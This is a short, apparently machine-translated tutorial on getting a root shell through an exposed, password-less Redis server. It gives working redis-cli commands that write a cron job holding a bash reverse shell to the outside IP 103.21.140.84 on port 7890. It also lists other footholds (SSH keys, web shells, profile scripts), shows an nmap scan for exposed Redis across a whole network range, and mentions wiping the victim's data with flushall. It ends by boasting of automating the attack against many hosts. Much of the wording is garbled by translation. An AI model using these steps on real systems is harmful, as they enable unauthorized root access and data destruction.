Example of Redis to get shell

Background

Redis The default installation is complete only on-machine access and no password.

The general company's application will require multiple servers to access Redis, so the operation dimension will be/etc/redis.conf in the Bind-ip to 0.0.0.0, resulting in the extranet can be anonymous access (no password required).

The problem that the extranet can visit causes is Redis data leakage, this time still cannot cause direct use.

But if the Redis is started with the root account, it will cause the get SHELL.

Use the way

Through the Redis Config command, you can write to any file, permissions enough to write timed task bounce to get the shell

# even a redis.
Redis-cli-h Your_redis_server

# Keep Write clean, erase original data (if it's someone else's machine, don't recommend it)
# Flushall

# Set Key (0) for bash Bounce shell script, execute every minute, listen on 7890 ports on its own server (NC-VVL 7890)
Set 0 "\N\N*/1 * * * */bin/bash-i >&/dev/tcp/103.21.140.84/7890 0>&1\n\n"

# Set Where to save
Config set dir/var/spool/cron/

# Set the saved file name
Config set dbfilename root

# Save
Save

A variety of use posture

In addition to the direct write time task to get the shell, there can be a variety of postures.

Write cron Bounce a shell
Write ~/.ssh/authorized_keys, log in using the key directly
Find the absolute path to the Web directory and write the Web shell directly
Write initialization script

/etc/profile.d/

Master-Slave Mode utilization

Enterprise internal Redis Anonymous mining

The Redis Anonymous access service is scanned through the NMAP network segment. (Can scan the extranet, of course)

$ nmap-p6379 10.11.0/16--script Redis-info
Yes, that's the hole. Let me Wooyun ranked 10 days forward 10 pages, automated use, every day to see the report can be.